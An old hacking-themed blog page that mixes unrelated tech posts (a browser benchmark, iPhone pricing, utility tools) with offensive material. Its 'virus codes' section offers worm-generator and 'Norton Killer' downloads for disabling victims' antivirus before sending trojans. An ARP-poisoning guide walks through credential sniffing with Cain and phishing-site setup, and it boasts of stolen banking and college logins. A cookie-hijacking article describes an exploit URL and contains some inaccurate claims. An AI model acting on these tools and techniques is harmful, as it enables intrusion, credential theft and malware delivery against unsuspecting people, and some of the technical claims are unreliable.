This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

virus codes

WormGen
WormGen , as its name describe,its a Worm Generator.Use this tool to creat a Worm.Use your custom messages and infections for lammers.Click the download link below to download it. Remember to disable your anti virus software (at your pc).Otherwise your antivirus would`nt allow to use it.
http://www.geocities.com/darfun_victims/wormgen.zip

Worm Gen 2.0
Its also Worm Generator ,its verision 2.0,updated. Try it.
http://www.geocities.com/darfun_victims/wormgen2.zip

Norton Killer

Here is software that disables victim`s anti virus if its Norton AV.Useful for those who are trying to send Trojans to the victim, send this file to the victim before sending a Trojan so your Trojan will not be detected.
http://www.geocities.com/darfun_victims/norton_killer.zip.zip

Add A Splash Screen To Mozilla Firefox

I don’t know why splash screens were made. But they can add some and masala and mint to a software, they look nice and beautiful. Many softwares such as Adobe Photoshop, Flash and many others already have splash screens but our beloved browser, Firefox lacks one. Some may say that splash screens are nagging and interfere in our work but for others they offer a refreshing start for our work.

Splash!

Is an extension for Mozilla products which can add splash screens not only to Firefox but also to Flock, Thunderbird and Sunbird.

You just have to select any image which has to act as the splash, select the background color, specify if there should be any text displayed or sound played and Voila! You have your own splash screen ready.

Download the Splash Add-on

If you like, you can create your own splash screen (or just keep the photo of your dear ones) or have one ready made from here Ready Made Splash Screens.

Well, my favorite is this one

New iPhone comes Only for 8k!

Apple on Monday unveiled a new version of its popular Apple iPhone, equipped with 3G Internet access and more business-related features.“It’s incredibly zippy,” chief executive Steve Jobs said as he demonstrated the new mobile device at the opening of Apple’s annual Worldwide Developers Conference in San Francisco.“We’ve taken what we’ve learned with the first iPhone, and created the iPhone 3G; and it’s beautiful,” he said.The crowd cheered when Jobs said the iPhone 3G will cost $199 (Rs 8,500 approx) with 8GB of memory. The 16GB model will sell for $299 (Rs 13,000 approx).The iPhone 3G – said to be two times faster than the firstgen iPhone – is designed for longer talk times, and takes advantage of the high-speed network to provide built-in GPS mapping, Jobs said.It also includes Wi-Fi support, and push email service like the one on Blackberry devices, letting business users send and receive Microsoft Exchange email.Apple announced it will begin rolling out new versions of the sleek smartphone devices on July 11, and make it available in 70 countries.Bharti Airtel and Vodafone, who had both announced tieups with Apple to release the iPhone in India, said they will be offering the Apple iPhones here. Details of pricing and availability will be announced at a later date. AGENCIES

Basics ARP Poison routing

Introduction This paper will lay out for you the basics of an ARP Poison Routing (APR) attack and Man in the Middle (Mitm) attacks. These are very simple attacks, but can be very powerful on unsecured networks. These attacks are so easy I could provide you a walkthrough of how to do this in Cain in about one paragraph, but you wouldn’t learn anything and would become a skiddy.

Before reading this, I suggest you learn a little about networks and the OSI 7-layer model (http://www.webopedia.com/quick_ref/OSI_Layers.asp) and media access control (MAC) addresses, as these attacks take advantage of protocols that work on OSI layers other than what you are usually used to (ie, HTTP on layer 7 and TCP on layer 4, whereas ARP works on layer 2) and do not use only IP addresses for identifying computers.

Address Resolution Protocol:

The Address Resolution Protocol (ARP) is a layer 2 protocol that maps IP addresses to hardware MAC addresses. When a computer wants to find another computer on its network, it uses the ARP to identify where that computer is and how to reach it. There are 9 types of ARP packets, but only 4 are relevant here:

1. ARP – What MAC has this IP address?

2. ARP Response – This MAC has this IP address.

3. RARP – What IP has this MAC address?

4. RARP Response – This IP has this MAC address.
If you are trying to contact a computer on another network (ie, over the internet) then ARP is used to contact your border gateway and route packets to it. The gateway is then responsible for routing the packets to the desire network using IP addresses and various routing protocols instead of ARP. Once the packet has arrived at the correct network, the router that received it will then use ARP again to route the packet around the network to its final destination.

The address resolution protocol works on a stateless broadcast request/single reply communication model. This means when one computer wants to know the address of another; it will broadcast a request for the address across the whole network in the form of What computer is 123.123.123.123? Tell 00:FF:AC:C5:56:3B. The computer that has the IP address of 123.123.123.123 would then send a directed reply, NOT broadcast, saying 90:F5:63:CA:BB:32 has 123.123.123.123. The MAC address in the reply is then added to the local computer’s cache, or if a mapping already exists for either the IP or MAC being used, the cache is updated to reflect this new info. The MAC/IP mapping is then used to route traffic around the network.

ARP Poison Routing (APR)

Now that you know the basics of how ARP works, let’s explore some pitfalls in the protocol. As I’ve said before, ARP is a stateless protocol. This means that each computer does not remember the state of its ARP requests/replies, and thus, does not remember if it sent a request or if it is waiting for a reply or has already received a reply to a previous request. So if we send an ARP reply, the host will accept it and alter its cache accordingly, even if the host didn’t send out a request! So if we send a reply to a target computer saying that our MAC address corresponds to the local gateway’s IP, then any traffic coming out of the target computer bound for the internet will be instead routed to your computer. You can use this to execute a DoS attack and prevent any packets from the target computer reaching the internet or you can sniff the packets for passwords and then pass them on to the real gateway. The second method is a very effective way of getting sensitive information and is fairly undetectable unless the target is monitoring their ARP cache constantly. APR can be setup with either 1-way or 2-way poisoning. 1-way poisoning will only poison the cache of a single target and will only intercept traffic coming from that computer, as shown below:

hack

Figure 1: 1-way APR

2-way poisoning effectively puts your computer directly between 2 target computers so that you can intercept network traffic coming from either host, as shown below:

hack2

Figure 2: 2-way APR

Some interesting attacks that can be used with APR include DoS attacks, Network sniffing/Packet stealing, and phishing.

DoS attacks can be accomplished using a 1-way poison and by redirecting traffic from a target computer to a gateway that doesn’t exist so they get ICMP Host Unreachable errors for all their network traffic, or you can redirect it to your computer and simply refuse to forward it to the proper destination. Network sniffing and packet stealing as well as Man in the Middle (Mitm) attacks require a 2-way poisoning scheme. Network sniffing and packet stealing would allow you to steal passwords and hashes that are passed over the network. With the proper filters, you can easily pick out plaintext passwords such as FTP, SMTP, HTTP form data, and hashes such as AIM and Yahoo messenger and SQL. You can even listen in on NetBios sessions and Telnet connections. With some simple phishing filters on your APR tool, you can redirect people from one website to one you control that looks the same where the victim will type in their login info unsuspectingly. This is often useful for grabbing plaintext passwords rather than having to brute force password hashes

One of the greatest hazards to be aware of when using APR is unintentional DoSing of the target or the entire network; because your computer is most likely NOT a dedicated router, and because the packets must travel all the way up the OSI model, be analyzed by your sniffer, then repackaged and sent all the way down the OSI model again, your computer can not handle packet routing as efficiently as a dedicated hardware router. This costs a great amount of time and CPU cycles and slows down the flow of traffic that may end up backing up and DoSing the target, the network, your computer, or any combination of the three. This is a serious issue and should not be taken lightly. If you APR a router on a large network, you may have hundreds of thousands of packets going thru your computer each second. Another hazard that is of interest to hackers is the fact that proxies cannot effectively be used, because ARP and APR works on layer 2 and proxies work on either layer 5 or 7 (depending on the amount of anonymity used) and usually require traveling outside the network to a proxy server. This may seem like a huge safety issue for a hacker, but there is hope! While IP addresses are difficult to spoof over the internet while keeping traffic flowing to and from your computer, both the IP address and MAC address can be effectively altered on a LAN. Many tools exist for changing your MAC and IP during APR attacks. Cain provides an option to do this under the “Configure” menu item.

Man In The Middle (Mitm) Attacks

Mitm attacks include a range of possible attacks, from DoSing, to sniffing, phishing, and rerouting for SE purposes. Mitm is started with a 2-way APR attack that in effect inserts your computer between 2 targets (often a host and a gateway). You can then begin the real meat of the mitm by using customized programs and packet filters to gain the effect you need.

For a simple sniffing attack, a network sniffer such as Ethereal with an IP or MAC filter applied to only capture packets to or from the target is sufficient. For more advanced attacks like password grabbing and phishing, you need more advanced filters. In the case of grabbing passwords, you need to have a filter that disassembles the packet to get to the layer 4 data and above, then scan that data for plaintext passwords or hashes such as HTTP POST or GET data, FTP, SMTP, or SQL login info, or you can use a filter to capture an entire NetBios, Telnet, or VoIP session to record conversations and gather potentially sensitive information. Sometimes it is not always desirable to have a password hash, especially when you can get the plaintext password in less time. This is where phishing comes in. Phishing is the art of constructing a website to look exactly like another, then redirecting traffic from the real site to the one you control in the hopes that no one will notice and will happily type in their real login info, assuming that everything is as it should be. Great care should be taken in conducting a phishing style attack, and I will offer some pointers and methods later on.

Because mitm attacks are built on the back of an APR attack, then all the limitations of an APR attack also apply to a mitm attack. But with the increased complexity of a mitm attack, you must also be aware of further limitations. Using complex filters or packet scanners consumes a lot of CPU cycles and can further increase the risk of unintentional DoSing or breaking of the network. Phishing should be used with care as well, because even the smallest difference between your site and the legitimate one will be noticed by daily users and may raise suspicion.

Phishing

Phishing, as already stated, is making a fake site to fool people into giving you their plaintext passwords and login info. There are several methods for creating a phishing site (phishing lure :D). You can attempt to create your copy site from scratch and code it yourself, but chances are people who use the site regularly would know the difference. Another way would be to copy the source code, images (keeping the directory structure in tact), and any stylesheets, javascripts, or embedded objects, then just make a few small changes to the code. Make sure to change all relative directories to absolute URLs when you do this! If you don’t, a form may not direct to the right page or produce a 404 error or an image may not display right and will raise suspicion. This method produces a site that looks and behaves nearly identically to the original, but because it is still being hosted on another server under a different domain name, observant users may spot the anomaly and report it. For low profile targets, this method is fast and effective. The final method I will discuss is how to do it without making a fake site at all. Because you are executing a mitm attack and have full access to every packet that moves to and from the target, you can create a packet filter that will change the ACTION property of a

tag, so that when the victim clicks the login button, the data will be sent to a site of your choice where you can log the information. This method may be slightly easier to execute, but it will increase the risk of unintentional DoSing due to the processing power required for the filter. No matter what method you choose to use, it is almost always a good idea to take the login info that you received from your fake site and pass it on to the real site to log the user on. This makes your attack more hidden and more difficult to detect. When doing this, make sure to catch errors coming back from the real site in case the user entered an invalid password or username. Then pass this information back to the user. This can be done easily and is no big deal to implement, but failing to do so may raise suspicion and may get you caught.

APR with Cain

Most people think of Cain as a simple password hash cracker, but it is actually much more. It is a very powerful network analyzer and password recovery tool as well as a cracker. It can dump protected storages, sniff network connections, enumerate hosts and users as well as network shares, and can even remotely install the backdoor program Abel. Now, on to the good stuff! I will show you a basic password sniffing mitm attack, but first, I assume you have Cain configured properly for your network card. If not, click the “Configure” menu option and read the help files.

Start up Cain and look at the icons in along the top, just under the menu. The 2 icons we will be concerned with here are the nuclear symbol (the APR icon) and the small circuit board with a red arrow (the sniffer icon). If you are not sure which icons I am talking about, hover your mouse over them and find the icons for “Start/Stop Sniffer” and “Start/Stop APR”. Click the sniffer icon to start the sniffer. Now go to the sniffer tab. The table shown in this tab provides you with information about computers currently on your network and should be blank. If not, clear it by right clicking and selecting “remove all”. The most useful columns right now are the first 4: IP Address, MAC Address, OUI Fingerprint, and Host Name. These should be pretty self explanatory with the exception of the OUI Fingerprint column. When a MAC address is coded into a piece of network hardware, part of the address is used to define the particular computer (like a serial number) and part is used to define the vendor that makes the hardware. Cain has a database of vendors that it checks the MAC address against to discover who made the hardware of that particular host. This is what is contained in the OUI Fingerprint column.

Once the sniffer is started, we need to populate the sniffer tab with host info. Click the “+” button to gather a list of all computers on the current network. If you have Ethereal, you can start that up with “arp” in the filter and watch Cain send out consecutive ARP requests for every IP in your subdomain and watch all the computers respond, freely giving away information about themselves. Once we have a list of possible targets, we need to setup an APR attack. Click on the “Start/Stop APR” icon to start the APR poisoner, then click the “APR” tab at the bottom of the “Sniffer” tab window. There are 2 tables in this tab: the top one is hosts on the LAN that you can directly affect, the bottom table is for computers on the WAN, which, depending on the border router’s settings, may or may not be vulnerable to APR. This list is populated as hosts are discovered thru analyzing packets.

Select the LAN table, and click the “+” icon again. Now select 2 hosts to insert yourself between. After that’s done, sit back and watch the packets roll in. Check the “Passwords” tab on the bottom for various passwords, or the branches under the “APR” symbol on the main APR tab to get HTTPS certificates and other valuable information. The APR-DNS branch can be used in phishing and in redirecting traffic from a website. Well, that’s it. That’s all there is to spying on people’s network traffic when you have access to a computer on the network, which is quite often if you go war-driving behind main street, picking up all the “insekure” business wi-fis ;)

Conclusions

On large or sensitive networks, APR and Mitm can be a very effective way of getting valuable information thru many means, including packet filters and sniffers, phishing, and traffic rerouting. Some of the overall limitations of ARP poisoning are that it cannot cross routers unless they are set up as a single autonomous unit (AU) and are contained in the same subnet. ARP poisoning can be easily thwarted if static caches are being used. Static caches prevent host caches from being updated remotely via the ARP protocol. Some of the interesting things I have actually been able to get from APR and Mitm include:

- Webmail and SMTP logins

- FTP logins to servers running FTPD as root (w00t!)

- FTP logins to websites (pwnt)

- Admin logins to sites

- Student and teacher account logins to my college (I can change their schedules for next year :D)

- AIM convos/hashes and Telnet/SMB/SSH sessions

- Wardriving behind businesses to take over their networks

- Online banking login info and certificates (free moneys!)
Things I’ve learned from my exploits: SECURE YOUR Network! And DON’T do important things on a public network (library, school). You never know when Big Brother is watching ;)

Links, References, and Tools

- Cain

- Ettercap

- Ethereal

- ARPoison

- Dsniff

- Parasite

- WinARPSpoofer

- http://en.wikipedia.org/wiki/ARP_spoofing

- http://www.grc.com/nat/arp.htm



Browser Speed Tests: Which Is Fastest?

Google's new Chrome web browser beta is getting a lot of attention for its slick looks, helpful features, and performance, but how does it rank against the early releases of more established browsers? We've previously put the major browser releases to the speed test, but today we're measuring Chrome against the second beta of Internet Explorer 8, as well as the beta of Firefox 3's next iteration, 3.1. We tested tomorrow's browsers on startup and page-loading times, JavaScript and CSS performance, and, perhaps most importantly to the average user, memory use on launch and with lots of content loaded. Read on to get the scoop on which bleeding-edge beta has the edge in the browser time trials.

The Tests

As with my previous browser tests, I installed completely fresh copies of the three browsers on my Windows Vista laptop, with all settings left to defaults. With the second beta of Internet Explorer 8, I reset the browser to factory settings and chose whatever Microsoft suggested during the click-through setup.

My test system has the same specs as before: A 2 GHz Intel Core 2 Duo processor, 2GB of memory, and running Windows Vista Home Premium. For the time-based tests, I again used Rob Keir's ultra-lightweight timer app, simultaneously tapping the "\" key with "Enter" to launch a browser shortcut or folder full of bookmarks. I performed each test on each browser three times and averaged out the results, while eliminating obvious oddities. (With Vista's often empirical hard drive usage, there were definitely artificially long start-ups).

It's the same system I used to test Internet Explorer 7, Firefox 3 RC3, Safari for Windows, and Opera 9.5, so you can make fair comparisons between all the browsers. It's not scientific in the strict sense, but it's meant to measure browser performance as real humans experience it—load, click, and wait.

Test 1: Startup Time—Winner: Chrome!

Drawing inspiration again from Mark Wilton-Jones trend-setting tests, I timed each browser loading up "cold" load (straight off a system restart) and "warm" (having run twice already). I used a locally-saved copy of Google's minimalist home page to negate net connection variations, and, to compensate for Vista's start-up fickleness, timed each browser exactly two minutes after boot-up. Here are the first results:



Note the small scale of the time on the X-axis: Even though Chrome was (quite surprisingly) slower at startup than Firefox or even IE 8, it's less than a second of difference between them all. That's a bit more than an error from my twitchy fingers, but probably not enough to rate any one browser on. Let's check out the warm boots:



As you can see, Chrome's noticeably fast on reload, although all the results are so close it's hard to confidently crown a winner. Just like last time, IE 8 slightly edges out Firefox on warm boots, but lags just a bit behind when starting up.

You don't start your browser to look at clean, white, locally-saved pages, do you? No, you speed around your must-visit sites, and often keep a bushel of them open at once. For the next test, I led each browser page-by-page through the assortment of web sites pictured at right—some heavy with interactive elements, some just text and pictures—before jumping back to a blank page (entering about:blank does this in any browser) and loading all the links at once. Each browser keeps a spinning icon on tabs as they load, so I measured from first click to the last tab settling in.



IE 8 and Chrome clock in too close to call, but Firefox fell behind. Based on the minuscule difference in cold-boot time and the two warm tests, I'd call Chrome the fastest, but definitely hand IE 8 a Most Improved Player trophy at the awards banquet.

Test 2: JavaScript & CSS—Tie: Firefox & Chrome!

JavaScript continues to grow in importance as a browser benchmark, because it's the backbone of no-reload interfaces like Gmail, Facebook, and lots of other webapps. Once again I used Sean Patrick Kane's revised JavaScript speed tests and averaged out three results to measure the browsers:



Firefox bests Chrome in this test by a handy lead, while IE 8 takes nearly twice as long (in milliseconds, of course) to perform all the actions Sean runs it through. It's anybody's guess who's got the most objective test—CNET's testers show Chrome wrecking all comers, while Mozilla's own tests declare their orange scrapper the winner in tight races. I can only take away that IE 8 is definitely an improvement from IE 7's fall-behind pace, while Chrome and Firefox are pretty evenly matched...

...until I ran the CSS tests, that is. CSS determines the layout and appearance of a page, and nontropp's downloadable form makes a browser work like a page designer on an all-guarana-and-coffee diet.



In the CSS test, as you can see, Chrome takes a commanding lead, Firefox doesn't lag too far behind, and IE 8 actually stalled and froze on just about one of every two loads I ran. When it came out of memory freeze, it did report consistent times, though—consistently behind. One could hand the Dynamic Web Performance title to Firefox for the probably weightier JavaScript test, but Chrome also shows a notable grace in running down the type frequently found on blogs. Let's call this a tie.

Test 3: Memory Use—Winner: Firefox!

How far the great-great-nephew of Netscape has come in its respect for your system's resources. Measured by Vista's Task Manager from cold boots and then with eight tabs loaded, Firefox shows some serious savvy with megabytes:



Do note, however, that Chrome handles tabs differently than others—each tab loads as its own process, so that if it crashes or stalls, the rest of your reading doesn't go down with it. So if you've got solid-state chips to spare, it's not that much more of a hit to run Chrome in a busy session.

As with our last test, we'll note that browsing is much more than speed and bit usage—many of us can't imagine web life without our favorite extensions, or Windows integration, or, soon enough, Chrome's unique features.



source life hacker

How to Extract text from PDF, DOC, HTML, CHM, and RTF files

You can use Text-Mining-Tool to automatically extract text from a PDF file so that you can use it in any program freely. Or if you cannot open a PDF file because you do not have a PDF viewer installed, you can use this tool to extract the text and read the document.



Text Mining Tool is completely free and does not even require an installation, simply unzip it and run the program to use it.



text mining tool



Click the Open button and choose your file that you want to convert to text. Click ok and the large window below the buttons will eventually fill with all of the text extracted from the document.



extract text



Click Save to save the extracted text to your computer. You can also click Clipboard to copy the mined text to the Windows clipboard.



For convenience, the following hotkeys can be used to perform the operations:



* Open - F3 or O.

* Save - F2 or S.

* Clipboard - F5 or C.

* Exit - F10 or Escape.



You can also use the minetext console tool to create a batch script for extracting text from multiple files. This can be useful if you have a directory with a large number of files that need to have text extracted.





-



If you’re a web designer, this program can be very useful to grab the text from a Word document without getting all of the extra Microsoft Office styling code included with the text.



This is a very simple program that is very simple to use! It has one basic purpose and it does a good job! Enjoy!

Cookies Unveiled

By entr0py
Section 1 - Introduction
Whenever you visit a page in the Internet you are always sleuthed by the Dark Shadows of the Webmaster. They sleuth you by the means of a simple text file called as Cookies. I am not talking about those flat sweet cakes. These cookies are very dangerous because whatever you do, whenever you do, they follow you everywhere...
Section 2 - What exactly is a Cookie?
Cookie is an extremely small piece of information transmitted by the Web Server to your system, so that it can retrieve your personal information from that particular browser. It is usually saved in the browser's temporary directory. It is usually stored in the memory of the system. Cookies can only tell whether you have visited the page before or not. It is sort of a counter which stores important data in a minuscule file. Cookies are indisputably the most authentic way to acquire information about an Internet user. Cookies are often used as password grabber. What I mean to say by this is that cookies are often used for storing password, so that you don't have to type it off again and again.
Section 3 - Where do I find Cookies?
Cookies are found easily in all the major web browsers like Firefox, Internet Explorer and Netscape. You must know the storage basin, to access the cookies spitefully. Okay, so I have listed the areas of the storage below:

- Internet Explorer: Tools - Internet Options

- Netscape 4: Open the file cookies.txt in your favorite text editor like Notepad or Wordpad.

- Netscape 6: Edit - Preferences, select privacy and security, then select view stored cookies

- Mozilla Firefox: Options - Privacy, click on Privacy tab and then Cookies. Click on View Cookies, to view them one by one.

- Mac: Cookies on a MAC are commonly stored in "Magic Cookies" folder.

Whenever a cookie is set in your system, the information extracted from them is supposed to direct the browser of the domains approved by the specific cookie. When you open a cookie you get loads of information about the user who browsed the particular website, which transmitted a cookie in the system. Let me give you an example to show the typical data you will get when you view a cookie file:
Name: yahoo
Content: z=zBs9EBzHB.EBTt5g--&a=AAE&sk=DAA8Vv0fUjh6er&d=c0E-:203.156.22.11
Domain: yahoo.com
Path: /
Send For: Any type of connections
Expires: At end of session
In the above example you can clearly see that I am visiting Yahoo. The content is a multifaceted code, which can be easily exploited. You can also see my IP address has been stored.
Section 4 - Varieties of Cookies
There are just two major types cookies, which invades your system.

- Advertising Cookies

Cookies are sometimes saved through Advertisements. You must have seen loads of pointless advertisements present in a website. The basic mechanism of the invasion is quiet straightforward. Just before the Advertisement loads, a text file sets itself in your system. It garners useful information about your surfing habits, so as to match them with their portfolio. It also lets them count the number of visits.

A typical advertisement cookie would be like this:
Name: TZID
Content: 2087143250694530103
Domain: .ad.uk.tangozebra.com
Path: /a
Send For: Any type of connections
Expires: At end of session
- Forum Cookies

Cookies stored by Web Forums are the most precarious variety of cookie because a few amendments of data can lead to a major invasion of privacy. The most vulnerable vendor is phpBB; it can be harnessed easily via modules available in the Internet. I may say that vBulletin is the most unassailable Bulletin Board System.

A typical forum cookie would be like this:
Name: sb_netsec_ccip
Content: a%3A2%3A%7Bs%3A9%3A%22Anonymous%22%361%3B%7D
Domain: forums.securitybay.org
Path: /phpBB
Send For: Any type of connections
Expires: At end of session
Section 5 - What are Cookies used for?
Cookies have acquired as an insecure form of data depot because of its propensity of storing passwords and other personal information. They are also used for saving preferences of the homepage. A malicious use who has an access to the cookies can easily decipher them to gather information about the legitimate user. He cannot just open the file and get the information. He has to access it by a Cookie Grabber and then edit the codings to get fruitful results. Cookies have some advantageous uses too. Site Surfing is the most advantageous use of Cookies. Suppose you are visiting any site like Rediff. You don't want to check all the offers presented by them. So, after denying it, you will not get it until the cookie expires. You must have also seen the innovative implementation of a new option called "Remember Me" in forums and mail sites. This makes your surfing much more hassle-free than usual, but yes, it is quite dangerous as it can be exploited very roughly.
Section 6 - How do Cookies Function?
The functionality of a Cookie isn't complex. They are very straightforward to understand. Here is an example of a cookie, which I am going to elaborate profusely:
Set-Cookie:TZID=VALUE;
Expires= At end of session;
Path=/a
Domain= .ad.uk.tangozebra.com
Now, let me elaborate the above script set by the cookie:

TZID=VALUE

This thread is a series of characters, there is a requirement to emplace data like name or the specific value. There is some encoding required for the above script. Encoding like URL style %XX is suggested.

Expires= At end of session

This feature defines a specific date thread which validates the time of the cookie. When the expiration date is attained, then the cookie becomes unusable.

Path=/a

This feature is used to define the division of the URL in a specific domain. If the path is not given, then it is assumed that path is the same document positioned in the header of the cookie.

Domain= .ad.uk.tangozebra.com

This feature defines the specific domain from which the cookie has been stored.
Section 7 - Getting Rid of Cookies
Invalidating Cookies

In Internet Explorer 6, go to Tools, then Internet Options and then click on privacy. Then slide the bar to whichever point you are satisfied. When you are contented, select OK or Apply.

In Internet Explorer 4 and 5, go to Tools, then Internet Options, after that Security. Choose Internet, and then click on Custom level. Scroll down to Cookies and pick Disable.

In Netscape Navigator, go to Edit and then Preferences. Choose advanced, check "Disable Cookies" and press OK.

NOTE: Some sites like Yahoo! Require cookies.

Deleting Cookies

Internet Explorer 5: Just open the folder C:\Windows\Temporary Internet Files\Now, you will see some text files, select all of them and delete them.

Internet Explorer 6: Go to Tools, then Internet Options, Press "Delete Cookies" and press ok.

Netscape 4: Open the file cookies.txt using your favorite text editor and delete the objects.

Netscape 6: Go to Edit, then Preferences, then select Privacy and Security, then click on View Stored Cookies. Choose "Remove All Cookies".
Section 8 - Cookie Hijacking
It is the law of the computing nature that cookies can only be read by the domains which created and stored it. Quite a few exploits has been initiated to allow cookies to be managed. Let me intricate one exploit, which is a very popular exploit used by malicious attackers. In this exploit, the attacker can access anyone's cookie by simply knowing the cookie's name and supplementing three dots in the domain panel.
www.anysite.com.../getcookie.cgi
The three dots affixed after the domain name can trick the web browser. The web browser won't recognize the origin of the cookie. It won't know whether it is from the supplicant or it has been approved to read. If the cookie is read by malevolent attacker, then he will surely use the cookie to emulate the legitimate user. So, Cookie Hijacking can be defined as when an attacker steals a cookie of a legitimate user and emulates malicious operations. Cookie Hijacking can be so potent, that it can even trounce SSL. What happens is that whenever a secure connection is instituted and the same connection is connected to another unsecured website, then the cookie becomes unencrypted and thus it can be penetrated easily.

Security Note: Microsoft released a patch to prevent cookie hijacking from IIS servers. You can get more information by viewing Security Bulletin MS00-080.
Section 9 - Cookie Spoofing
An attacker can easily utilize legitimate user's cookie to impersonate as the user on a specific site. As I have earlier told you that an attacker can acquire cookie via cookie hijacking. But, imagine if the website which stored the cookie has infixed password information in their cookie! The attacker can easily infiltrate any website by the means of the legitimate user's cookie as he can gather fruitful information from the cookie. This may comprise password information, credit card information, and personal information like phone number, residence address etc. Let me tell you that hijacking cookies can be potentially strong, but hijacking session cookies is one of the most powerful attacks because it gives you a fuller access to a specific websites. To prevent these attacks, one must be aware of the threats. Secondly to repress the usage of session cookies, the webmaster should reduce the session time of the cookie, like if the expiry of these cookies is 30 minute, then the webmaster should reduce it to 15 minutes. Thirdly if you can encipher the cookie or affix a Message Authentication Code to the footer of the cookie. Cookie Spoofing is one of the easiest to practice, but it can be precarious if altered maliciously. Like, if you hijack a cookie and adjust your cookie, so that it shows the hijacked cookie, then you can enter any website by the means of the hijacked cookie. Once you enter you can infuse malwares in the web server. Well I don't encourage crime, but I am just describing you what an attacker can do if he gets an access to your cookies.
Section 10 - Conclusion
Okay, now let me tell you that staying anonymous on the web is almost impossible. It is not an automated process of getting tracked; it is the malicious usage of cookie. A delicate alteration of a cookie can lead to many problems. So it's better to be aware of the threats, so that you try your best to prevent these attacks. Don't wait, just act fast because these attacks are going to be more and more potent and destructive.